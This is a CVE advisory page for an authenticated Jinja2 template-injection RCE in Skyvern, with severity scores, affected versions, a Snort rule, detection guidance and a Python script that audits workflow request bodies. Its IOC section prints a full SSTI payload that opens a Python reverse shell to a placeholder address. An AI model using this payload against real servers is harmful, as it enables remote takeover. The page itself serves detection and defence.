cbcvebase.
CVE-2025-49619
published 2025-06-07


Priority: P1 · 82 · high
CVSS 3.1: 8.5
AV:N · AC:L · PR:L · UI:N · S:C · C:H · I:L · A:N
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 13.75% (96.0th percentile)
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).

Affected

2 ranges
Vendor | Product | Version range | Fixed in
skyvern | skyvern | <= 0.1.85 |
skyvern | skyvern | 0 – 0.2.0 |

Detection & IOCs (extracted from sources)

url: /api/v1/workflows
command: {% for x in ().__class__.__base__.__subclasses__() %} {% if 'warning' in x.__name__ %} {{ x()._module.__builtins__['__import__']('os').popen( "python3 -c 'import socket,os,pty;" "s=socket.socket();" "s.connect((\"<ip>\",<port>));" "os.dup2(s.fileno(),0);" "os.dup2(s.fileno(),1);" "os.dup2(s.fileno(),2);" "pty.spawn(\"sh\")'" ).read() }} {% endif %} {% endfor %}
other: X-API-Key
path: /api/v1/workflows/{workflow_permanent_id}/run
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/workflows"; fast_pattern; http.request_body; content:"prompt"; content:"|7b|"; distance:0; pcre:"/((?<=(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f))\x7b|\x7b(?:\x25|\x23|\x2f))[\x20-\x7e]+/"; reference:url,attackerkb.com/topics/4Hq1jtfYEq/cve-2025-49619; reference:cve,2025-49619; classtype:web-application-attack; sid:2064150; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_08_25, cve CVE_2025_49619, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_08_25, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Detect POST requests to /api/v1/workflows whose body contains a 'prompt' field with Jinja2 template delimiters (e.g., `{{`, `{%`, `{#`). The Snort rule's pcre matches a `{` preceded by one of `{`, `$`, `#`, `~`, `@`, `*`, `%`, `_`, or a `{` followed by `%`, `#` or `/`.
  • The exploit workflow uses block_type 'task_v2' with a crafted 'prompt' field containing Jinja2 SSTI payload targeting Python's `__subclasses__()` chain to reach `os.popen()` for RCE. Monitor workflow creation API calls for these patterns.
  • The exploit requires an authenticated API key passed via the `X-API-Key` header. Anomalous workflow creation (POST /api/v1/workflows) followed immediately by execution (POST /api/v1/workflows/{id}/run) from the same API key is a strong behavioral indicator.
  • TLS decryption is required for effective detection per the Snort rule metadata (`tls_state TLSDecrypt`). Ensure inspection is performed on decrypted traffic at the perimeter and internally.
  • The vulnerability affects Skyvern versions through 0.1.85 (Metasploit module targets <=0.1.84). Exploitation requires a valid API key — this is an authenticated vulnerability, not unauthenticated RCE.
  • The injection point is specifically the 'Prompt' field of workflow blocks such as the Navigation v2 Block and task_v2 block type. Other block types may also be affected if they process Jinja2 templates.
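
The prompt-field check from the notes above, applied to captured workflow-creation request bodies instead of on the wire. This is an added example, not code from Skyvern or from the sources quoted on this page. The JSON layout around `block_type` and `prompt`, the function names, and the idea that benign prompts may carry plain `{{ name }}` placeholders are assumptions; the walk is schema-agnostic for that reason.

```python
import json
import re

# Jinja2 expression / statement / comment openers named in the detection note.
DELIMS = re.compile(r"\{\{|\{%|\{#")
# Dunder access, the building block of the __class__/__subclasses__ chain above.
DUNDER = re.compile(r"__[A-Za-z]+__")


def iter_prompts(node, path="$"):
    """Yield (json_path, text) for every string-valued 'prompt' key at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "prompt" and isinstance(value, str):
                yield child, value
            else:
                yield from iter_prompts(value, child)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_prompts(value, f"{path}[{i}]")


def classify(text):
    """Return 'clean', 'template' (delimiters only) or 'suspicious' (delimiters + dunder)."""
    if not DELIMS.search(text):
        return "clean"
    return "suspicious" if DUNDER.search(text) else "template"


def audit_workflow(body):
    """Map each prompt's JSON path to its classification for one request body."""
    return {path: classify(text) for path, text in iter_prompts(json.loads(body))}


# Constructed sample body; the layout around block_type/prompt is an assumption.
SAMPLE = json.dumps({
    "title": "demo",
    "workflow_definition": {"blocks": [
        {"block_type": "task_v2", "label": "a", "prompt": "Open the pricing page"},
        {"block_type": "task_v2", "label": "b", "prompt": "Search for {{ query }}"},
        {"block_type": "task_v2", "label": "c",
         "prompt": "{% for x in ().__class__.__base__.__subclasses__() %}{% endfor %}"},
    ]},
})

if __name__ == "__main__":
    for path, verdict in audit_workflow(SAMPLE).items():
        print(verdict, path)
```

A 'template' verdict is worth reviewing against the API key that submitted it; 'suspicious' warrants checking whether a run request for the same workflow followed. Bodies that carry the definition in another encoding have to be decoded before the walk.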

CVSS provenance

nvd · v3.1 · 8.5 · HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
vulncheck · 8.5 · HIGH